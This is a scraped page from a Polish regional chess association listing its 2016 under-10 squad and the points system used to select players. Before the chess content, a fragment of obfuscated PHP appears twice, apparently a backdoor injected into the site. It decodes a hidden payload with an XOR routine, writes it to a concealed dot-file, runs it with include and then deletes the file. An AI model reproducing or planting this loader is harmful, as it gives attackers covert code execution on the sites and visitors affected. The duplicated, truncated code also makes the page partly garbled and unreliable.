100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Kadra Województwa Łódzkiego Młodzików na rok 2016 | Łódzki Związek Szachowy Skip to main content

Kadra Województwa Łódzkiego Młodzików na rok 2016

Przedstawiamy kadrę województwa łódzkiego młodzików na rok 2016, kryteria powołania do kadry oraz system punktacji.

KADRA WOJEWÓDZTWA ŁÓDZKIEGO MŁODZIKÓW NA ROK 2016
L.p. Nazwisko i imię Klub Data urodzenia Nr licencji
1 Nowacka Anna KSz Piątka Skierniewice 2006-12-02 09201077
2 Jaśkiewicz Kacper UKS Jedynka Bełchatów 2007-03-22 05200260
3 Bukała Weronika UKS Jedynka Bełchatów 2006-01-09 05200277
4 Szymajda Karolina KSz Piątka Skierniewice 2006-11-05 05200239
5 Szczepanik Magdalena KSz Piątka Skierniewice 2007-11-05 05200292
6 Błaźniak Bartłomiej UKS Jedynka Bełchatów 2006-04-04 13200290
7 Nowicki Filip KSz Piątka Skierniewice 2006-12-07 05200241
Zawodnicy rezerwowi
8 Matuszewska Kinga ŁKS Szach-Centrum Łódź 2008-03-29 05200253
9 Kopaniewski Wojciech ŁKS Szach-Centrum Łódź 2007-10-05 05200265
10 Dumin Karolina UKS Jedynka Bełchatów 2007-02-08 05200270
11 Zalega Maciej Łódzki Związek Szachowy 2007-02-28 05200296
12 Psyk Włodzimierz KSz Piątka Skierniewice 2007-10-10 05200242
13 Reszka Barbara KSz Piątka Skierniewice 2007-06-28 05200204
14 Małecka Natalia UKS Pałac Nieborów 2006-03-25 05200271
15 Nowaczyk Wiktoria UKS Dziewiątka Sieradz 2006-07-22 05200256
16 Mitręga Wiktoria UKS Pałac Nieborów 2008-08-07 05200334
17 Adamala Jacek KS LogIN Skierniewice 2008-04-21 05200291

 

Kryteria powołania do kadry:

  1. Awans do Mistrzostw Polski Młodzików do lat 10
  2. Zdobycie największej ilości punktów w punktacji prowadzonej przez Łódzki Związek Szachowy

 

System punktacji:

  • Mistrzostwa Polski Młodzików do lat 10- szachy klasyczne
Zajęte miejsce Liczba przyznanych punktów
1 10
2-3 9
4-6 8
7-10 7
11-15 6
16-21 5
22-28 4
29-36 3
37-45 2
46-55 1

 

  • Mistrzostwa Polski Młodzików do lat 10 – szachy szybkie

 

Zajęte miejsce
Liczba przyznanych punktów
1 9
2-3 8
4-7 7
8-12 6
13-18 5
19-25 4
26-33 3
34-42 2
43-55 1

 

  • Mistrzostwa Polski Młodzików do lat 10 – szachy błyskawiczne

 

Zajęte miejsce Liczba przyznanych punktów
1 8
2-3 7
4-8 6
9-14 5
15-21 4
22-30 3
31-40 2
41-55 1

 

  • Mistrzostwa Międzywojewódzkie Młodzików do lat 10

 

Zajęte miejsce
Liczba przyznanych punktów
1 6
2-3 5
4-6 4
7-10 3
11-15 2
16-22 1

 

  • Mistrzostwa Województwa Młodzików do lat 10

 

Zajęte miejsce
Liczba przyznanych punktów
1 5
2-3 4
4-6 3
7-10 2
11-15 1

 

Dodaj komentarz